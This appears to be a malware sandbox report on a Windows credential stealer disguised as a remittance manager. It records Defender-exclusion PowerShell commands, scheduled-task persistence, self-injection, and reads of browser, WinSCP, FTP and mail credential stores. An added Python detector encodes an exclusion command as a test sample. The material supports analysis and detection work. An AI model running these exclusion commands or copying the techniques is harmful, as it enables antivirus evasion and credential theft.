                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Memory written: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Memory written: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp"
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Process created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
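The process-creation lines above carry three independently detectable behaviours: a Defender exclusion added through Add-MpPreference, a scheduled task created from an XML file in the user's Temp directory, and a process spawning its own image right after an MZ header was written at that image's base (the injection pattern the "Memory written" lines record). The Python below is an added example, not code from this report or from the sample: it turns those observations into rules run over constructed lines in a "Source: <parent> | <behaviour>" style modelled on the report, and goes one step beyond the visible commands by decoding a PowerShell -EncodedCommand argument before matching, since the same cmdlet is routinely launched base64-encoded. The sample lines, the ENCODED variant, the tag names and the temp-directory list are assumptions made for the example.

```python
import base64
import re
from collections import defaultdict

PROC_RE = re.compile(r"Source: (\S+).*?Process created: (\S+) (.*)")
MZ_WRITE_RE = re.compile(
    r"Source: (\S+).*?Memory written: (\S+) base: [0-9A-Fa-f]+ value starts with: 4D5A")
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")

# Constructed sample input (an assumption for this example, not copied from the
# report); the third powershell line is a base64-encoded variant built right here.
PLAIN_EXCLUSION = r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"'
ENCODED = base64.b64encode(PLAIN_EXCLUSION.encode("utf-16le")).decode("ascii")
SAMPLE_LINES = rf"""
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoP -W Hidden -enc {ENCODED}
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Memory written: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp"
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Memory written: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Process created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-MpPreference
"""


def effective_command(cmdline):
    """The command PowerShell would actually run: decode -EncodedCommand (UTF-16LE
    inside base64) when present, otherwise the command line as given."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def classify(parent, image, cmdline):
    """Tags for one process-creation event; an empty list means nothing of note."""
    image_l, cmd_l = image.lower(), effective_command(cmdline).lower()
    tags = []
    if (image_l.endswith("powershell.exe")
            and re.search(r"\b(add|set)-mppreference\b", cmd_l) and "-exclusion" in cmd_l):
        tags.append("defender_exclusion")          # T1562.001
    if (image_l.endswith("schtasks.exe") and "/create" in cmd_l and "/xml" in cmd_l
            and any(d in cmd_l for d in TEMP_DIRS)):
        tags.append("task_from_temp_xml")          # T1053.005
    if image_l == parent.lower():
        tags.append("self_spawn")                  # candidate injection target
    return tags


def triage(report_text):
    """parent -> [(child image, tags)] for every event that matched a rule."""
    findings = defaultdict(list)
    mz_targets = set()
    for line in report_text.splitlines():
        m = MZ_WRITE_RE.search(line)
        if m:
            mz_targets.add(m.group(2).lower())
            continue
        m = PROC_RE.search(line)
        if m:
            parent, image, cmdline = m.groups()
            tags = classify(parent, image, cmdline)
            if tags:
                findings[parent].append((image, tags))
    # A self-spawn whose child image also had an MZ header written at its base is
    # the PE-injection pattern, not a plain restart of the program.
    for events in findings.values():
        for i, (image, tags) in enumerate(events):
            if "self_spawn" in tags and image.lower() in mz_targets:
                events[i] = (image, tags + ["pe_overwrite_in_child"])
    return dict(findings)


if __name__ == "__main__":
    for parent, events in triage(SAMPLE_LINES).items():
        for image, tags in events:
            print(f"{parent} -> {image}: {', '.join(tags)}")
```

The rules key on the child image plus the decoded command rather than on the parent, so the same logic applies to a 4688 or Sysmon event 1 record; the explorer.exe line with Get-MpPreference produces no finding, which is the false-positive case a plain "MpPreference" substring match would trip on.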
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Queries volume information: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe VolumeInformation
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (2 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (6 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b11250.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b4d470.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 3892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 2760, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XNYbGrcoFr.exe PID: 5096, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XNYbGrcoFr.exe PID: 5308, type: MEMORYSTR
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
